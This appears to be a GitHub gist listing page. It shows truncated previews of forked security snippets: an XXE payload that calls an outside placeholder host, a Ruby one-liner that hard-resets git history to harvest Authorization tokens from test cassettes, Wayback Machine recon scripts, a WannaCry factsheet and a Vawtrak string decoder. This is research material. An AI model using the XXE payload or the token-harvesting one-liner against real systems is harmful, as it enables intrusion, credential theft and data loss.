Skip to content

Instantly share code, notes, and snippets.

View viyatb's full-sized avatar

Viyat viyatb

83 followers · 6 following
View GitHub Profile
@viyatb
viyatb / XXE_payloads
Created September 7, 2017 00:19 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@viyatb
viyatb / android-decompile.sh
Created September 5, 2017 23:45 — forked from nstarke/android-decompile.sh
Android APK Decompile Script
#!/bin/bash
APK=$1
# Linux only right now.
if [ ! -d "$HOME/.android-decompile-tools" ]; then
mkdir "$HOME/.android-decompile-tools"
fi
@viyatb
viyatb / supervisord-example.conf
Created August 30, 2017 17:37 — forked from Sapphire64/supervisord-example.conf
Running virtualenv tornado in supervisord, running virtualenv celery in supervisord
[unix_http_server]
file=/tmp/supervisor.sock ; path to your socket file
[supervisord]
logfile=/var/log/supervisord/supervisord.log ; supervisord log file
logfile_maxbytes=50MB ; maximum size of logfile before rotation
logfile_backups=10 ; number of backed up logfiles
loglevel=error ; info, debug, warn, trace
pidfile=/var/run/supervisord.pid ; pidfile location
nodaemon=false ; run supervisord as a daemon
@viyatb
viyatb / extract-authorization-header-for-vcr.rb
Created August 24, 2017 22:24 — forked from jobertabma/extract-authorization-header-for-vcr.rb
One-liner to reset last 1000 git commits and extract the Authorization header to look for tokens from VCR cassettes
# VCR cassettes stored in JSON
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.json').map { |f| c = JSON.parse(IO.read(f)); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
# VCR cassettes stored in YAML
v = []; 1000.times { `git reset --hard HEAD~1`; v << Dir.glob('spec/support/cassettes/**/*.yml').map { |f| c = YAML.load_file(f); c['http_interactions'].map { |i| i['request']['headers']['Authorization'] } }.flatten.uniq }; puts v.flatten.uniq
@viyatb
viyatb / waybackurls.py
Created July 16, 2017 21:33 — forked from mhmdiaa/waybackurls.py
import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
@viyatb
viyatb / waybackrobots.py
Created July 16, 2017 21:33 — forked from mhmdiaa/waybackrobots.py
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
@viyatb
viyatb / Wannacrypt0r-FACTSHEET.md
Created May 13, 2017 19:17 — forked from rain-1/Wannacrypt0r-FACTSHEET.md

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

  • Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
  • Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
  • Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
  • Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
  • Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm.

SECURITY BULLETIN AND UPDATES HERE: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

@viyatb
viyatb / vawtrak_string_decoder.py
Created April 18, 2017 02:35 — forked from herrcore/vawtrak_string_decoder.py
IDA python string decoder for Vawtrak 930eccf4bedcd5e0901306410787adc6a95acd957a7383d326d9949c76fcc828
import idaapi, idc, idautils
import re
import struct
import base64
flag_arr=[]
def decrypt_algo(key, data, data_len):
out=""
for i in range(0, data_len):
@viyatb
viyatb / test.c
Created March 15, 2017 23:57
Test
Hi
@viyatb
viyatb / how-to-view-source-of-chrome-extension.md
Created March 12, 2017 14:52 — forked from paulirish/how-to-view-source-of-chrome-extension.md
How to view-source of a Chrome extension

Option 1: Command-line download extension as zip and extract

extension_id=jifpbeccnghkjeaalbbjmodiffmgedin   # change this ID
curl -L -o "$extension_id.zip" "https://clients2.google.com/service/update2/crx?response=redirect&os=mac&arch=x86-64&nacl_arch=x86-64&prod=chromecrx&prodchannel=stable&prodversion=44.0.2403.130&x=id%3D$extension_id%26uc" 
unzip -d "$extension_id-source" "$extension_id.zip"

Thx to crxviewer for the magic download URL.